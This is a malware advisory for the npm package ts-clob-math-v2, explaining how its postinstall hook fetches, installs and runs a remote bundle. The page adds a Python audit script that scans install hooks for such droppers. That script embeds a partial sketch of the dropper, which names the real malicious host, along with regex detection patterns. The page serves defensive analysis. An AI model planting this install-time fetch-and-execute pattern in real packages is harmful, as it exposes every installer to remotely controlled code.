ts-clob-math-v2 @2.0.1
Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC
OSV ID
MAL-2026-6719
Ecosystem
npm
Summary
On npm install, the postinstall script scripts/install-check.cjs resolves a bundle URL from a remote JSON config at polymarket-clob-service.vercel.app (with env-var overrides PSM_PEER_URL / PSM_SYNC_CONFIG / KELLY_PEER_CONFIG), downloads an arbitrary .tgz to a temp directory, extracts it into a hidden .peer/ directory, runs npm install inside that extracted tree, then require()s peer-math.js from the fetched bundle and invokes syncSession(). The fetched code is unpinned, unhashed, unsigned, and mutable: the operator of polymarket-clob-service.vercel.app can serve any payload to every installer at any time. Errors are swallowed via console.warn('[polymarket-stake-math] install check skipped:', msg), so the dropper fails silently and does not disrupt normal npm install output. Function and env-var names (resolvePeerBundleUrl, runPeerSync, syncSession, PSM_PEER_URL) frame the fetch-and-execute as benign 'peer sync'. The package name and README (Polymarket clob client math sdk v2) impersonate Polymarket's CLOB client namespace, while the shipped code is only trivial Kelly math plus the dropper; the polymarket-clob-service.vercel.app host is not on a Polymarket-owned domain.
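The summary above describes a recognisable shape: a lifecycle hook whose script reaches out to a remote host, unpacks what it gets, runs a nested npm install and require()s the result, with errors swallowed so nothing looks wrong. The following audit script is an added example written for this page; it is not code from osv.dev, Amazon Inspector or the package. It reads a package.json plus the script files a hook command points at and reports which of those indicators each hook exhibits. The two sample packages are constructed: the malicious one is a sketch built only from the names and behaviour the advisory states (the config path and the JSON field name are placeholders, and the download and extraction steps are deliberately left as comments), and the benign one is a typical version-stamping hook for contrast.

```python
"""Heuristic audit of an npm package for the install-time fetch-and-execute
pattern described in the advisory. Added example; all inputs are constructed."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Textual indicators checked in each lifecycle script. None is conclusive on
# its own; "remote fetch" combined with "nested install" or "dynamic require"
# is what separates a dropper from, say, a native build or version stamp step.
INDICATORS = {
    "remote_fetch": re.compile(r"https?://|\bfetch\s*\(|\bhttps?\.get\s*\("),
    "env_override": re.compile(r"process\.env\.[A-Z0-9_]+"),
    "archive_handling": re.compile(r"\.tgz\b|\btar\b|\bzlib\b|\bgunzip\b"),
    "nested_install": re.compile(r"\bnpm\s+(?:i|install|ci)\b"),
    # require() whose argument is not a string literal, e.g. require(path.join(...))
    "dynamic_require": re.compile(r"require\s*\(\s*(?!['\"])"),
    "temp_or_hidden_dir": re.compile(r"os\.tmpdir\s*\(|['\"]\.[A-Za-z][\w-]*['\"]"),
    "swallowed_errors": re.compile(r"catch\s*\([^)]*\)\s*\{\s*console\.(?:warn|log)"),
}


def lifecycle_scripts(pkg):
    """Return {hook: command} for every lifecycle hook declared in package.json."""
    scripts = pkg.get("scripts", {})
    return {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}


def referenced_file(command, files):
    """Pick the script file a hook command runs (e.g. 'node scripts/x.cjs')."""
    for tok in command.split():
        if tok in files and tok.endswith((".js", ".cjs", ".mjs")):
            return tok
    return None


def script_indicators(src):
    """Names of all indicators whose pattern occurs in the script source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def risk_level(indicators):
    hits = set(indicators)
    if "remote_fetch" in hits and hits & {"nested_install", "dynamic_require"}:
        return "high"
    if "remote_fetch" in hits:
        return "medium"
    return "low"


def audit_package(pkg, files):
    """pkg is the parsed package.json; files maps package-relative paths to text."""
    report = {}
    for hook, cmd in lifecycle_scripts(pkg).items():
        path = referenced_file(cmd, files)
        inds = script_indicators(files[path]) if path else []
        report[hook] = {"command": cmd, "file": path,
                        "indicators": inds, "risk": risk_level(inds)}
    return report


# Constructed sketch of the behaviour the advisory describes. CONFIG_PATH_PLACEHOLDER
# and the bundleUrl field are assumptions, not values from the advisory.
MALICIOUS_PKG = {"name": "ts-clob-math-v2", "version": "2.0.1",
                 "scripts": {"postinstall": "node scripts/install-check.cjs"}}
MALICIOUS_FILES = {"scripts/install-check.cjs": r"""
const https = require('https');
const path = require('path');
const os = require('os');
const { execSync } = require('child_process');
const CONFIG_URL = process.env.PSM_SYNC_CONFIG
  || 'https://polymarket-clob-service.vercel.app/CONFIG_PATH_PLACEHOLDER';
function resolvePeerBundleUrl(cfg) { return process.env.PSM_PEER_URL || cfg.bundleUrl; }
function runPeerSync(bundleUrl) {
  const tgz = path.join(os.tmpdir(), 'bundle.tgz');
  const peerDir = path.join(__dirname, '..', '.peer');
  // ... download bundleUrl to tgz and extract it into peerDir (omitted) ...
  execSync('npm install', { cwd: peerDir });
  require(path.join(peerDir, 'peer-math.js')).syncSession();
}
try {
  https.get(CONFIG_URL, res => { /* parse JSON cfg, then runPeerSync(resolvePeerBundleUrl(cfg)) */ });
} catch (err) {
  console.warn('[polymarket-stake-math] install check skipped:', err.message);
}
"""}

# Constructed benign package: a postinstall hook that only stamps a version file.
BENIGN_PKG = {"name": "example-lib", "version": "1.0.0",
              "scripts": {"postinstall": "node scripts/write-version.js", "test": "jest"}}
BENIGN_FILES = {"scripts/write-version.js": r"""
const fs = require('fs');
const pkg = require('../package.json');
fs.writeFileSync('version.txt', pkg.version);
"""}

if __name__ == "__main__":
    for pkg, files in ((MALICIOUS_PKG, MALICIOUS_FILES), (BENIGN_PKG, BENIGN_FILES)):
        print(pkg["name"], json.dumps(audit_package(pkg, files), indent=2))
```

Run against a real package, read package.json from the unpacked tarball into pkg and load the script files it references into files; in practice you would run this over node_modules after `npm install --ignore-scripts`, so the hooks are inspected before they ever execute. The indicator list is a starting point for triage, not a verdict: a native addon build legitimately uses tar and a nested build step, and the combination with an unpinned remote fetch is the part that warrants a block.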
Source: amazon-inspector (99f4cf4a66881bb3bf0a0695b3cf021902b46a8c82c99102c27a779139437de9)